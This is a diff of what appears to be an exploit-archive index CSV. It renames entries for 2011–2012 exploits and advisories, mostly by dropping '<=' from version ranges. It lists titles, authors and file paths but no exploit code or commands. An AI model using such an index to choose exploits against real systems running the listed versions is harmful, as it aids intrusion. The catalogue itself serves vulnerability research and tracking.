+17792,platforms/php/webapps/17792.txt,"PlaySms 0.9.5.2 - Remote File Inclusion",2011-09-06,NoGe,php,webapps,0 +17793,platforms/php/webapps/17793.txt,"WordPress SCORM Cloud plugin 1.0.6.6 - SQL Injection",2011-09-07,"Miroslav Stampar",php,webapps,0 +17794,platforms/php/webapps/17794.txt,"WordPress Eventify - Simple Events plugin 1.7.f SQL Injection",2011-09-07,"Miroslav Stampar",php,webapps,0 17795,platforms/windows/dos/17795.py,"Crush FTP 5 - 'APPE' command Remote JVM BSOD PoC Exploit",2011-09-07,"BSOD Digital",windows,dos,0 17796,platforms/windows/dos/17796.txt,"Windows Server 2008 R1 - Local Denial of Service",2011-09-07,Randomdude,windows,dos,0 -17797,platforms/php/webapps/17797.txt,"WordPress Paid Downloads plugin <= 2.01 - SQL Injection",2011-09-08,"Miroslav Stampar",php,webapps,0 -17798,platforms/php/webapps/17798.txt,"WordPress Community Events plugin <= 1.2.1 - SQL Injection",2011-09-08,"Miroslav Stampar",php,webapps,0 +17797,platforms/php/webapps/17797.txt,"WordPress Paid Downloads plugin 2.01 - SQL Injection",2011-09-08,"Miroslav Stampar",php,webapps,0 +17798,platforms/php/webapps/17798.txt,"WordPress Community Events plugin 1.2.1 - SQL Injection",2011-09-08,"Miroslav Stampar",php,webapps,0 17800,platforms/php/webapps/17800.txt,"AM4SS 1.2 - CSRF add admin",2011-09-08,"red virus",php,webapps,0 17801,platforms/php/webapps/17801.rb,"WordPress 1 Flash Gallery Plugin - Arbiraty File Upload Exploit (Metasploit)",2011-09-08,"Ben Schmidt",php,webapps,0 17803,platforms/windows/local/17803.php,"DVD X Player 5.5 Pro - (SEH DEP + ASLR Bypass) Exploit",2011-09-08,Rew,windows,local,0 21788,platforms/windows/dos/21788.pl,"FastStone Image Viewer 4.6 - ReadAVonIP Crash PoC",2012-10-07,"Jean Pascal Pereira",windows,dos,0 21787,platforms/php/webapps/21787.rb,"MyAuth3 - Blind SQL Injection",2012-10-07,"Marcio Almeida",php,webapps,0 -17806,platforms/linux/dos/17806.txt,"FTP Client (Ubuntu <= 11.04) - Local Buffer Overflow Crash PoC",2011-09-08,localh0t,linux,dos,0 +17806,platforms/linux/dos/17806.txt,"FTP Client (Ubuntu 11.04) - Local Buffer Overflow Crash PoC",2011-09-08,localh0t,linux,dos,0 17807,platforms/php/webapps/17807.txt,"OpenCart 1.5.1.2 - Blind SQL",2011-09-08,"RiRes Walid",php,webapps,0 -17808,platforms/php/webapps/17808.txt,"WordPress WP-Filebase Download Manager plugin <= 0.2.9 - SQL Injection",2011-09-09,"Miroslav Stampar",php,webapps,0 -17809,platforms/php/webapps/17809.txt,"WordPress A to Z Category Listing plugin <= 1.3 - SQL Injection",2011-09-09,"Miroslav Stampar",php,webapps,0 -17810,platforms/windows/remote/17810.rb,"BisonFTP Server <= 3.5 - Remote Buffer Overflow Exploit (Metasploit)",2011-09-09,"SecPod Research",windows,remote,0 +17808,platforms/php/webapps/17808.txt,"WordPress WP-Filebase Download Manager plugin 0.2.9 - SQL Injection",2011-09-09,"Miroslav Stampar",php,webapps,0 +17809,platforms/php/webapps/17809.txt,"WordPress A to Z Category Listing plugin 1.3 - SQL Injection",2011-09-09,"Miroslav Stampar",php,webapps,0 +17810,platforms/windows/remote/17810.rb,"BisonFTP Server 3.5 - Remote Buffer Overflow Exploit (Metasploit)",2011-09-09,"SecPod Research",windows,remote,0 17811,platforms/php/webapps/17811.txt,"MYRE Real Estate Software - Multiple Vulnerabilities",2011-09-09,"SecPod Research",php,webapps,0 17813,platforms/php/webapps/17813.txt,"Xataface WebAuction and Xataface Librarian DB - Multiple Vulnerabilities",2011-09-09,"SecPod Research",php,webapps,0 -17814,platforms/php/webapps/17814.txt,"WordPress Event Registration plugin <= 5.44 - SQL Injection",2011-09-09,serk,php,webapps,0 +17814,platforms/php/webapps/17814.txt,"WordPress Event Registration plugin 5.44 - SQL Injection",2011-09-09,serk,php,webapps,0 17815,platforms/windows/dos/17815.py,"MelOn Player 1.0.11.x - Denial of Service PoC",2011-09-09,modpr0be,windows,dos,0 -17816,platforms/php/webapps/17816.txt,"WordPress Tune Library plugin <= 2.17 - SQL Injection",2011-09-10,"Miroslav Stampar",php,webapps,0 +17816,platforms/php/webapps/17816.txt,"WordPress Tune Library plugin 2.17 - SQL Injection",2011-09-10,"Miroslav Stampar",php,webapps,0 17817,platforms/windows/local/17817.php,"ScadaTEC ModbusTagServer & ScadaPhone (.zip) Buffer Overflow Exploit (0Day)",2011-09-12,mr_me,windows,local,0 17818,platforms/php/webapps/17818.txt,"TomatoCart 1.1 Post Auth Local File Inclusion",2011-09-12,brain[pillow],php,webapps,0 17819,platforms/windows/remote/17819.py,"KnFTP Server - Buffer Overflow Exploit",2011-09-12,blake,windows,remote,0 @@ -15485,33 +15485,33 @@ id,file,description,date,author,platform,type,port 17824,platforms/php/webapps/17824.txt,"Slaed CMS - Code Execution",2011-09-12,brain[pillow],php,webapps,0 17825,platforms/php/webapps/17825.txt,"AstroCMS - Multiple Vulnerabilities",2011-09-12,brain[pillow],php,webapps,0 21785,platforms/windows/dos/21785.pl,"HCView WriteAV Crash PoC",2012-10-07,"Jean Pascal Pereira",windows,dos,0 -17827,platforms/windows/remote/17827.rb,"Procyon Core Server HMI <= 1.13 - Coreservice.exe Stack Buffer Overflow",2011-09-12,Metasploit,windows,remote,0 +17827,platforms/windows/remote/17827.rb,"Procyon Core Server HMI 1.13 - Coreservice.exe Stack Buffer Overflow",2011-09-12,Metasploit,windows,remote,0 17829,platforms/php/webapps/17829.txt,"dotProject 2.1.5 - SQL Injection",2011-09-13,sherl0ck_,php,webapps,0 -17828,platforms/php/webapps/17828.txt,"WordPress Plugin Forum Server <= 1.7 - SQL Injection",2011-09-13,"Miroslav Stampar",php,webapps,0 -17830,platforms/windows/dos/17830.txt,"Microsoft WINS Service <= 5.2.3790.4520 - Memory Corruption",2011-09-13,"Luigi Auriemma",windows,dos,0 +17828,platforms/php/webapps/17828.txt,"WordPress Plugin Forum Server 1.7 - SQL Injection",2011-09-13,"Miroslav Stampar",php,webapps,0 +17830,platforms/windows/dos/17830.txt,"Microsoft WINS Service 5.2.3790.4520 - Memory Corruption",2011-09-13,"Luigi Auriemma",windows,dos,0 17831,platforms/windows/dos/17831.txt,"Microsoft WINS ECommEndDlg Input Validation Error",2011-09-13,"Core Security",windows,dos,0 -17832,platforms/php/webapps/17832.txt,"WordPress Plugin e-Commerce <= 3.8.6 - SQL Injection",2011-09-14,"Miroslav Stampar",php,webapps,0 -17833,platforms/windows/local/17833.rb,"ScadaTEC ScadaPhone <= 5.3.11.1230 - Stack Buffer Overflow",2011-09-13,Metasploit,windows,local,0 -17835,platforms/windows/dos/17835.txt,"Beckhoff TwinCAT <= 2.11.0.2004 - Denial of Service",2011-09-14,"Luigi Auriemma",windows,dos,0 -17836,platforms/windows/dos/17836.txt,"Equis MetaStock <= 11 Use After Free",2011-09-14,"Luigi Auriemma",windows,dos,0 -17837,platforms/windows/dos/17837.txt,"eSignal and eSignal Pro <= 10.6.2425.1208 - Multiple Vulnerabilites",2011-09-14,"Luigi Auriemma",windows,dos,0 -17838,platforms/windows/dos/17838.txt,"Cogent DataHub <= 7.1.1.63 - Stack Overflow",2011-09-14,"Luigi Auriemma",windows,dos,0 -17839,platforms/windows/dos/17839.txt,"Cogent DataHub <= 7.1.1.63 Integer Overflow",2011-09-14,"Luigi Auriemma",windows,dos,0 -17840,platforms/windows/webapps/17840.txt,"Cogent DataHub <= 7.1.1.63 Source Disclosure",2011-09-14,"Luigi Auriemma",windows,webapps,0 -17841,platforms/windows/dos/17841.txt,"DAQFactory <= 5.85 build 1853 - Stack Overflow",2011-09-14,"Luigi Auriemma",windows,dos,0 -17842,platforms/windows/dos/17842.txt,"progea movicon / powerhmi <= 11.2.1085 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",windows,dos,0 -17843,platforms/windows/dos/17843.txt,"Rockwell RSLogix <= 19 - Denial of Service",2011-09-14,"Luigi Auriemma",windows,dos,0 -17844,platforms/windows/dos/17844.txt,"Measuresoft ScadaPro <= 4.0.0 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",windows,dos,0 +17832,platforms/php/webapps/17832.txt,"WordPress Plugin e-Commerce 3.8.6 - SQL Injection",2011-09-14,"Miroslav Stampar",php,webapps,0 +17833,platforms/windows/local/17833.rb,"ScadaTEC ScadaPhone 5.3.11.1230 - Stack Buffer Overflow",2011-09-13,Metasploit,windows,local,0 +17835,platforms/windows/dos/17835.txt,"Beckhoff TwinCAT 2.11.0.2004 - Denial of Service",2011-09-14,"Luigi Auriemma",windows,dos,0 +17836,platforms/windows/dos/17836.txt,"Equis MetaStock 11 Use After Free",2011-09-14,"Luigi Auriemma",windows,dos,0 +17837,platforms/windows/dos/17837.txt,"eSignal and eSignal Pro 10.6.2425.1208 - Multiple Vulnerabilites",2011-09-14,"Luigi Auriemma",windows,dos,0 +17838,platforms/windows/dos/17838.txt,"Cogent DataHub 7.1.1.63 - Stack Overflow",2011-09-14,"Luigi Auriemma",windows,dos,0 +17839,platforms/windows/dos/17839.txt,"Cogent DataHub 7.1.1.63 Integer Overflow",2011-09-14,"Luigi Auriemma",windows,dos,0 +17840,platforms/windows/webapps/17840.txt,"Cogent DataHub 7.1.1.63 Source Disclosure",2011-09-14,"Luigi Auriemma",windows,webapps,0 +17841,platforms/windows/dos/17841.txt,"DAQFactory 5.85 build 1853 - Stack Overflow",2011-09-14,"Luigi Auriemma",windows,dos,0 +17842,platforms/windows/dos/17842.txt,"progea movicon / powerhmi 11.2.1085 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",windows,dos,0 +17843,platforms/windows/dos/17843.txt,"Rockwell RSLogix 19 - Denial of Service",2011-09-14,"Luigi Auriemma",windows,dos,0 +17844,platforms/windows/dos/17844.txt,"Measuresoft ScadaPro 4.0.0 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",windows,dos,0 17846,platforms/jsp/webapps/17846.php,"Nortel Contact Recording Centralized Archive 6.5.1 - SQL Injection Exploit",2011-09-15,rgod,jsp,webapps,0 17847,platforms/windows/local/17847.py,"Mini-Stream Ripper 2.9.7 - DEP Bypass",2011-09-16,blake,windows,local,0 -17848,platforms/windows/remote/17848.rb,"Measuresoft ScadaPro <= 4.0.0 - Remote Command Execution",2011-09-16,Metasploit,windows,remote,0 +17848,platforms/windows/remote/17848.rb,"Measuresoft ScadaPro 4.0.0 - Remote Command Execution",2011-09-16,Metasploit,windows,remote,0 17849,platforms/windows/remote/17849.rb,"RealNetworks Realplayer QCP Parsing Heap Overflow",2011-09-17,Metasploit,windows,remote,0 17850,platforms/php/webapps/17850.txt,"iBrowser Plugin 1.4.1 (lang) - Local File Inclusion",2011-09-17,LiquidWorm,php,webapps,0 17851,platforms/php/webapps/17851.txt,"iManager Plugin 1.2.8 (lang) - Local File Inclusion",2011-09-17,LiquidWorm,php,webapps,0 17852,platforms/php/webapps/17852.txt,"iManager Plugin 1.2.8 (d) - Remote Arbitrary File Deletion",2011-09-17,LiquidWorm,php,webapps,0 17858,platforms/php/webapps/17858.txt,"WordPress Filedownload Plugin 0.1 - (download.php) Remote File Disclosure",2011-09-19,Septemb0x,php,webapps,0 17859,platforms/php/webapps/17859.txt,"Toko Lite CMS 1.5.2 - (edit.php) HTTP Response Splitting",2011-09-19,LiquidWorm,php,webapps,0 -17857,platforms/php/webapps/17857.txt,"WordPress Count per Day plugin <= 2.17 - SQL Injection",2011-09-18,"Miroslav Stampar",php,webapps,0 +17857,platforms/php/webapps/17857.txt,"WordPress Count per Day plugin 2.17 - SQL Injection",2011-09-18,"Miroslav Stampar",php,webapps,0 17854,platforms/windows/local/17854.py,"MY MP3 Player 3.0 m3u Exploit DEP Bypass",2011-09-17,blake,windows,local,0 17855,platforms/windows/remote/17855.rb,"DaqFactory HMI NETB Request Overflow",2011-09-18,Metasploit,windows,remote,0 17856,platforms/windows/dos/17856.py,"KnFTP 1.0.0 Server Multiple Buffer Overflow Exploit (DoS PoC)",2011-09-18,loneferret,windows,dos,21 @@ -15530,41 +15530,41 @@ id,file,description,date,author,platform,type,port 17872,platforms/php/webapps/17872.txt,"Multiple WordPress Plugin - timthumb.php Vulnerabilites",2011-09-19,"Ben Schmidt",php,webapps,0 17873,platforms/windows/webapps/17873.txt,"SharePoint 2007/2010 and DotNetNuke < 6 - File disclosure via XEE",2011-09-20,"Nicolas Gregoire",windows,webapps,0 17874,platforms/hardware/webapps/17874.txt,"NETGEAR Wireless Cable Modem Gateway Auth Bypass and CSRF",2011-09-20,"Sense of Security",hardware,webapps,0 -17876,platforms/windows/remote/17876.py,"ScriptFTP <= 3.3 - Remote Buffer Overflow (LIST) (1)",2011-09-20,modpr0be,windows,remote,0 +17876,platforms/windows/remote/17876.py,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (1)",2011-09-20,modpr0be,windows,remote,0 17877,platforms/windows/local/17877.py,"AVCon DEP Bypass",2011-09-20,blake,windows,local,0 -17878,platforms/windows/dos/17878.txt,"EViews <= 7.0.0.1 - (aka 7.2) Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos,0 -17879,platforms/windows/dos/17879.txt,"MetaServer RT <= 3.2.1.450 - Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos,0 -17880,platforms/windows/local/17880.rb,"eSignal and eSignal Pro <= 10.6.2425.1208 - File Parsing Buffer Overflow in QUO",2011-09-20,Metasploit,windows,local,0 -17882,platforms/php/webapps/17882.php,"JAKCMS PRO <= 2.2.5 - Remote Arbitrary File Upload Exploit",2011-09-22,EgiX,php,webapps,0 +17878,platforms/windows/dos/17878.txt,"EViews 7.0.0.1 - (aka 7.2) Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos,0 +17879,platforms/windows/dos/17879.txt,"MetaServer RT 3.2.1.450 - Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos,0 +17880,platforms/windows/local/17880.rb,"eSignal and eSignal Pro 10.6.2425.1208 - File Parsing Buffer Overflow in QUO",2011-09-20,Metasploit,windows,local,0 +17882,platforms/php/webapps/17882.php,"JAKCMS PRO 2.2.5 - Remote Arbitrary File Upload Exploit",2011-09-22,EgiX,php,webapps,0 17883,platforms/hardware/remote/17883.txt,"Blue Coat Reporter Unauthenticated Directory Traversal",2011-09-22,nitr0us,hardware,remote,0 -17884,platforms/windows/remote/17884.py,"Cogent Datahub <= 7.1.1.63 - Remote Unicode Buffer Overflow Exploit",2011-09-22,mr_me,windows,remote,0 -17885,platforms/windows/dos/17885.txt,"sunway forcecontrol <= 6.1 sp3 - Multiple Vulnerabilities",2011-09-23,"Luigi Auriemma",windows,dos,0 +17884,platforms/windows/remote/17884.py,"Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow Exploit",2011-09-22,mr_me,windows,remote,0 +17885,platforms/windows/dos/17885.txt,"sunway forcecontrol 6.1 sp3 - Multiple Vulnerabilities",2011-09-23,"Luigi Auriemma",windows,dos,0 17886,platforms/windows/remote/17886.py,"FreeFloat FTP Server Buffer Overflow Exploit (DEP Bypass)",2011-09-23,blake,windows,remote,0 -17887,platforms/php/webapps/17887.txt,"WordPress Link Library plugin <= 5.2.1 - SQL Injection",2011-09-24,"Miroslav Stampar",php,webapps,0 -17888,platforms/php/webapps/17888.txt,"WordPress AdRotate plugin <= 3.6.5 - SQL Injection",2011-09-24,"Miroslav Stampar",php,webapps,0 -17889,platforms/windows/dos/17889.txt,"Sterling Trader <= 7.0.2 Integer Overflow",2011-09-26,"Luigi Auriemma",windows,dos,0 +17887,platforms/php/webapps/17887.txt,"WordPress Link Library plugin 5.2.1 - SQL Injection",2011-09-24,"Miroslav Stampar",php,webapps,0 +17888,platforms/php/webapps/17888.txt,"WordPress AdRotate plugin 3.6.5 - SQL Injection",2011-09-24,"Miroslav Stampar",php,webapps,0 +17889,platforms/windows/dos/17889.txt,"Sterling Trader 7.0.2 Integer Overflow",2011-09-26,"Luigi Auriemma",windows,dos,0 17890,platforms/windows/dos/17890.c,"GMER 1.0.15.15641 MFT Overwrite",2011-09-26,Heurs,windows,dos,0 17891,platforms/php/webapps/17891.txt,"WordPress CevherShare Plugin 2.0 - SQL Injection",2011-09-26,bd0rk,php,webapps,0 17892,platforms/windows/local/17892.pl,"Muse Music All-In-One 1.5.0.001 - (.pls) Buffer Overflow (DEP Bypass)",2011-09-26,"C4SS!0 G0M3S",windows,local,0 17893,platforms/windows/local/17893.pl,"GTA SA-MP server.cfg - Local Buffer Overflow",2011-09-26,Silent_Dream,windows,local,0 -17894,platforms/php/webapps/17894.txt,"WordPress Mingle Forum plugin <= 1.0.31 - SQL Injection",2011-09-27,"Miroslav Stampar",php,webapps,0 +17894,platforms/php/webapps/17894.txt,"WordPress Mingle Forum plugin 1.0.31 - SQL Injection",2011-09-27,"Miroslav Stampar",php,webapps,0 17895,platforms/php/webapps/17895.txt,"Jarida 1.0 - Multiple Vulnerabilities",2011-09-27,"Ptrace Security",php,webapps,0 -17896,platforms/windows/dos/17896.txt,"PcVue <= 10.0 - Multiple Vulnerabilities",2011-09-27,"Luigi Auriemma",windows,dos,0 +17896,platforms/windows/dos/17896.txt,"PcVue 10.0 - Multiple Vulnerabilities",2011-09-27,"Luigi Auriemma",windows,dos,0 17897,platforms/jsp/webapps/17897.txt,"Omnidocs - Multiple Vulnerabilities",2011-09-27,"Sohil Garg",jsp,webapps,0 17900,platforms/asp/webapps/17900.txt,"timelive time and expense tracking 4.1.1 - Multiple Vulnerabilities",2011-09-28,"Nathaniel Carew",asp,webapps,0 17898,platforms/php/webapps/17898.txt,"redmind Online-Shop / E-Commerce-System SQL Injection",2011-09-27,"Indonesian BlackCoder",php,webapps,0 17901,platforms/osx/dos/17901.c,"Mac OS X < 10.6.7 - Kernel Panic Exploit",2011-09-28,hkpco,osx,dos,0 17902,platforms/windows/local/17902.c,"Norman Security Suite 8 - (nprosec.sys) Local Privilege Escalation (0Day)",2011-09-28,Xst3nZ,windows,local,0 -17903,platforms/windows/dos/17903.txt,"NCSS <= 07.1.21 Array Overflow with Write2",2011-09-29,"Luigi Auriemma",windows,dos,0 +17903,platforms/windows/dos/17903.txt,"NCSS 07.1.21 Array Overflow with Write2",2011-09-29,"Luigi Auriemma",windows,dos,0 17904,platforms/windows/remote/17904.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (Metasploit)",2011-09-29,otoy,windows,remote,0 17905,platforms/php/webapps/17905.txt,"Typo3 File Disclosure",2011-09-29,"Number 7",php,webapps,0 -17906,platforms/php/webapps/17906.txt,"WordPress Plugin Bannerize <= 2.8.7 - SQL Injection",2011-09-30,"Miroslav Stampar",php,webapps,0 +17906,platforms/php/webapps/17906.txt,"WordPress Plugin Bannerize 2.8.7 - SQL Injection",2011-09-30,"Miroslav Stampar",php,webapps,0 17908,platforms/freebsd/dos/17908.sh,"FreeBSD - UIPC socket heap Overflow Proof of Concept",2011-09-30,"Shaun Colley",freebsd,dos,0 17909,platforms/php/webapps/17909.txt,"MARINET CMS (room.php) <= Blind SQL",2011-09-30,"BHG Security Center",php,webapps,0 -17911,platforms/php/webapps/17911.php,"Feed on Feeds <= 0.5 - Remote PHP Code Injection Exploit",2011-09-30,EgiX,php,webapps,0 +17911,platforms/php/webapps/17911.php,"Feed on Feeds 0.5 - Remote PHP Code Injection Exploit",2011-09-30,EgiX,php,webapps,0 17918,platforms/windows/dos/17918.txt,"Adobe Photoshop Elements 8.0 - Multiple Arbitrary Code Execution Vulnerabilities",2011-10-02,LiquidWorm,windows,dos,0 17919,platforms/php/webapps/17919.txt,"Banana Dance CMS and Wiki SQL Injection",2011-10-02,Aodrulez,php,webapps,0 -17920,platforms/php/webapps/17920.txt,"Vivvo CMS - Local File include",2011-10-02,JaBrOtxHaCkEr,php,webapps,0 +17920,platforms/php/webapps/17920.txt,"Vivvo CMS - Local File Inclusion",2011-10-02,JaBrOtxHaCkEr,php,webapps,0 17921,platforms/asp/webapps/17921.txt,"GotoCode Online Bookstore - Multiple Vulnerabilities",2011-10-03,"Nathaniel Carew",asp,webapps,0 17922,platforms/cgi/webapps/17922.rb,"CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection",2011-10-02,Metasploit,cgi,webapps,0 17924,platforms/jsp/webapps/17924.pl,"JBoss & JMX Console & Misconfigured Deployment Scanner",2011-10-03,y0ug,jsp,webapps,0 @@ -15573,15 +15573,15 @@ id,file,description,date,author,platform,type,port 17927,platforms/php/webapps/17927.txt,"CF Image Hosting Script 1.3.82 File Disclosure",2011-10-04,bd0rk,php,webapps,0 17928,platforms/windows/dos/17928.pl,"Ashampoo Burning Studio Elements 10.0.9 - (.ashprj) Heap Overflow",2011-10-04,LiquidWorm,windows,dos,0 17929,platforms/windows/dos/17929.txt,"Google Chrome < 14.0.835.163 PDF File Handling Memory Corruption",2011-10-04,"Mario Gomes",windows,dos,0 -17930,platforms/windows/dos/17930.txt,"Cytel Studio <= 9.0.0 - Multiple Vulnerabilities",2011-10-04,"Luigi Auriemma",windows,dos,0 -17931,platforms/windows/dos/17931.txt,"genstat <= 14.1.0.5943 - Multiple Vulnerabilities",2011-10-04,"Luigi Auriemma",windows,dos,0 +17930,platforms/windows/dos/17930.txt,"Cytel Studio 9.0.0 - Multiple Vulnerabilities",2011-10-04,"Luigi Auriemma",windows,dos,0 +17931,platforms/windows/dos/17931.txt,"genstat 14.1.0.5943 - Multiple Vulnerabilities",2011-10-04,"Luigi Auriemma",windows,dos,0 17932,platforms/linux/local/17932.c,"PolicyKit polkit-1 <= 0.101 - Linux Local Privilege Escalation",2011-10-05,zx2c4,linux,local,0 17933,platforms/windows/dos/17933.html,"DivX Plus Web Player - 'file://' Buffer Overflow PoC",2011-10-05,Snake,windows,dos,0 18033,platforms/php/webapps/18033.txt,"Joomla YJ Contact us Component Local File Inclusion",2011-10-25,MeGo,php,webapps,0 17935,platforms/php/webapps/17935.txt,"tsmim Lessons Library (show.php) SQL Injection",2011-10-06,M.Jock3R,php,webapps,0 17936,platforms/windows/remote/17936.rb,"Opera 10/11 - (bad nesting with frameset tag) Memory Corruption (Metasploit)",2011-10-06,"Jose A. Vazquez",windows,remote,0 17937,platforms/php/webapps/17937.txt,"URL Shortener Script 1.0 - SQL Injection",2011-10-07,M.Jock3R,php,webapps,0 -17938,platforms/php/webapps/17938.txt,"EFront <= 3.6.9 Community Edition - Multiple Vulnerabilities",2011-10-07,IHTeam,php,webapps,0 +17938,platforms/php/webapps/17938.txt,"EFront 3.6.9 Community Edition - Multiple Vulnerabilities",2011-10-07,IHTeam,php,webapps,0 17939,platforms/windows/local/17939.py,"BlazeVideo HDTV Player 6.6 Professional - Universal DEP+ASLR Bypass",2011-10-07,modpr0be,windows,local,0 17940,platforms/linux_mips/shellcode/17940.c,"Linux/MIPS - execve shellcode (52 bytes)",2011-10-07,entropy,linux_mips,shellcode,0 17941,platforms/linux/webapps/17941.rb,"Spreecommerce 0.60.1 - Arbitrary Command Execution",2011-10-07,Metasploit,linux,webapps,0 @@ -15590,14 +15590,14 @@ id,file,description,date,author,platform,type,port 17944,platforms/php/webapps/17944.txt,"Joomla Component Time Returns (com_timereturns) 2.0 - SQL Injection",2011-10-08,kaMtiEz,php,webapps,0 17946,platforms/php/webapps/17946.txt,"NexusPHP 1.5 - SQL Injection",2011-10-08,flyh4t,php,webapps,0 17947,platforms/php/webapps/17947.rb,"Snortreport nmap.php and nbtscan.php Remote Command Execution",2011-10-09,Metasploit,php,webapps,0 -17948,platforms/windows/remote/17948.rb,"ScriptFTP <= 3.3 - Remote Buffer Overflow (LIST) (2)",2011-10-09,Metasploit,windows,remote,0 +17948,platforms/windows/remote/17948.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (2)",2011-10-09,Metasploit,windows,remote,0 17949,platforms/php/webapps/17949.rb,"myBB 1.6.4 Backdoor Exploit",2011-10-09,Metasploit,php,webapps,0 17950,platforms/php/webapps/17950.txt,"GotoCode Online Classifieds - Multiple Vulnerabilities",2011-10-09,"Nathaniel Carew",php,webapps,0 17951,platforms/php/webapps/17951.txt,"openEngine 2.0 - Multiple Blind SQL Injection vulnerabilities",2011-10-10,"Stefan Schurtz",php,webapps,0 17952,platforms/php/webapps/17952.txt,"KaiBB 2.0.1 - SQL Injection",2011-10-10,"Stefan Schurtz",php,webapps,0 17970,platforms/php/webapps/17970.txt,"WP-SpamFree WordPress Spam Plugin - SQL Injection",2011-10-11,cheki,php,webapps,0 17972,platforms/php/webapps/17972.txt,"MyBB MyStatus 3.1 - SQL Injection",2011-10-12,Mario_Vs,php,webapps,0 -17973,platforms/php/webapps/17973.txt,"WordPress GD Star Rating plugin <= 1.9.10 - SQL Injection",2011-10-12,"Miroslav Stampar",php,webapps,0 +17973,platforms/php/webapps/17973.txt,"WordPress GD Star Rating plugin 1.9.10 - SQL Injection",2011-10-12,"Miroslav Stampar",php,webapps,0 17969,platforms/multiple/remote/17969.py,"Apache mod_proxy Reverse Proxy Exposure PoC",2011-10-11,"Rodrigo Marcos",multiple,remote,0 17955,platforms/php/webapps/17955.txt,"Filmis 0.2 Beta - Multiple Vulnerabilities",2011-10-10,M.Jock3R,php,webapps,0 17956,platforms/php/webapps/17956.txt,"6kbbs - Multiple Vulnerabilities",2011-10-10,"labs insight",php,webapps,0 @@ -15607,9 +15607,9 @@ id,file,description,date,author,platform,type,port 17960,platforms/windows/remote/17960.rb,"Opera Browser 10/11/12 - (SVG layout) Memory Corruption (0Day) (Metasploit)",2011-10-10,"Jose A. Vazquez",windows,remote,0 17961,platforms/php/webapps/17961.txt,"MyBB Advanced Forum Signatures (afsignatures-2.0.4) SQL Injection",2011-10-10,Mario_Vs,php,webapps,0 17962,platforms/php/webapps/17962.txt,"MyBB Forum Userbar Plugin (Userbar 2.2) - SQL Injection",2011-10-10,Mario_Vs,php,webapps,0 -17963,platforms/windows/dos/17963.txt,"atvise webMI2ADS Web Server <= 1.0 - Multiple Vulnerabilities",2011-10-10,"Luigi Auriemma",windows,dos,0 -17964,platforms/windows/dos/17964.txt,"IRAI AUTOMGEN <= 8.0.0.7 Use After Free",2011-10-10,"Luigi Auriemma",windows,dos,0 -17965,platforms/windows/dos/17965.txt,"OPC Systems.NET <= 4.00.0048 - Denial of Service",2011-10-10,"Luigi Auriemma",windows,dos,0 +17963,platforms/windows/dos/17963.txt,"atvise webMI2ADS Web Server 1.0 - Multiple Vulnerabilities",2011-10-10,"Luigi Auriemma",windows,dos,0 +17964,platforms/windows/dos/17964.txt,"IRAI AUTOMGEN 8.0.0.7 Use After Free",2011-10-10,"Luigi Auriemma",windows,dos,0 +17965,platforms/windows/dos/17965.txt,"OPC Systems.NET 4.00.0048 - Denial of Service",2011-10-10,"Luigi Auriemma",windows,dos,0 17966,platforms/windows/local/17966.rb,"ACDSee FotoSlate PLP File id Parameter Overflow",2011-10-10,Metasploit,windows,local,0 17967,platforms/windows/local/17967.rb,"TugZip 3.5 Zip File Parsing Buffer Overflow",2011-10-11,Metasploit,windows,local,0 17974,platforms/windows/remote/17974.html,"Mozilla Firefox - Array.reduceRight() Integer Overflow Exploit",2011-10-12,ryujin,windows,remote,0 @@ -15617,18 +15617,18 @@ id,file,description,date,author,platform,type,port 17976,platforms/windows/remote/17976.rb,"Mozilla Firefox - Array.reduceRight() Integer Overflow",2011-10-13,Metasploit,windows,remote,0 17977,platforms/windows/remote/17977.txt,"JBoss AS 2.0 - Remote Exploit",2011-10-11,kingcope,windows,remote,0 17978,platforms/windows/dos/17978.txt,"Windows - .fon Kernel-Mode Buffer Overrun PoC (MS11-077)",2011-10-13,"Byoungyoung Lee",windows,dos,0 -17980,platforms/php/webapps/17980.txt,"WordPress Contact Form plugin <= 2.7.5 - SQL Injection",2011-10-14,Skraps,php,webapps,0 +17980,platforms/php/webapps/17980.txt,"WordPress Contact Form plugin 2.7.5 - SQL Injection",2011-10-14,Skraps,php,webapps,0 17981,platforms/windows/dos/17981.py,"Windows - TCP/IP Stack Denial of Service (MS11-064)",2011-10-15,"Byoungyoung Lee",windows,dos,0 17982,platforms/windows/dos/17982.pl,"BlueZone Desktop .zap file Local Denial of Service",2011-10-15,Silent_Dream,windows,dos,0 -17983,platforms/php/webapps/17983.txt,"WordPress Plugin Photo Album Plus <= 4.1.1 - SQL Injection",2011-10-15,Skraps,php,webapps,0 +17983,platforms/php/webapps/17983.txt,"WordPress Plugin Photo Album Plus 4.1.1 - SQL Injection",2011-10-15,Skraps,php,webapps,0 17985,platforms/windows/local/17985.rb,"Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow",2011-10-16,Metasploit,windows,local,0 17984,platforms/php/webapps/17984.txt,"Ruubikcms 1.1.0 - (/extra/image.php) Local File Inclusion",2011-10-16,"Sangyun YOO",php,webapps,0 17986,platforms/osx/remote/17986.rb,"Apple Safari file:// Arbitrary Code Execution",2011-10-17,Metasploit,osx,remote,0 17987,platforms/php/webapps/17987.txt,"WordPress BackWPUp Plugin 2.1.4 - Code Execution",2011-10-17,"Sense of Security",php,webapps,0 17993,platforms/windows/remote/17993.rb,"Apple Safari Webkit libxslt Arbitrary File Creation",2011-10-18,Metasploit,windows,remote,0 -17994,platforms/php/webapps/17994.php,"Dolphin <= 7.0.7 - (member_menu_queries.php) Remote PHP Code Injection",2011-10-18,EgiX,php,webapps,0 +17994,platforms/php/webapps/17994.php,"Dolphin 7.0.7 - (member_menu_queries.php) Remote PHP Code Injection",2011-10-18,EgiX,php,webapps,0 17989,platforms/php/webapps/17989.txt,"Dominant Creature BBG/RPG Browser Game Persistent XSS",2011-10-17,M.Jock3R,php,webapps,0 